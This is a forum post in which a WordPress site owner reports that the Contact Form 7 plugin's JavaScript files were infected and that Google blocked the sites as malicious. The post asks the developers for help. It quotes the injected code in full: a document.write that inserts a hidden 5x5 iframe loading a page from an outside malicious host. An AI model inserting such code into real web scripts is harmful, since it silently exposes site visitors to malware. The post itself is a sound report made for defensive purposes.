Contact Form 7 malware attached to scripts

Hi..

I am having repeated issues on multiple websites that i use CF7 with malware attached to some scripts…identified as code injection by webmaster tools…
The websites are being ‘blocked’ by google…and the browser…landing on a message page instead the url homepage…saying “The Website Ahead Contains Malware!”.

The url of the malware is like this:
http://…/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.3.1

The code inserted is:

document.write('<iframe src="http://jnvzpp.sellClassics.com/
geographicallyconquering.cgi?8" scrolling="auto" frameborder
="no" align="center" height="5" width="5"></iframe>');

I tried removing the iframe that appears inserted at the bottom of all of the scripts in the JS folder of CF7…manually…but i dont yet know if they will be regenerated by another kind of script.

From forums i read there a security breach to a lot of sites through CF7.
Some quoted that by removing the plugin removed the problem as well.
I will have to do the same if there is no action addressed to this security problem.

Could someone from the developers comment on this?

Or…if anyone else who has resolved this issue…could shed some light to this troubling case.

Thank u for a great plugin…We ought to keep it that way.

.v.

http://wordpress.org/extend/plugins/contact-form-7/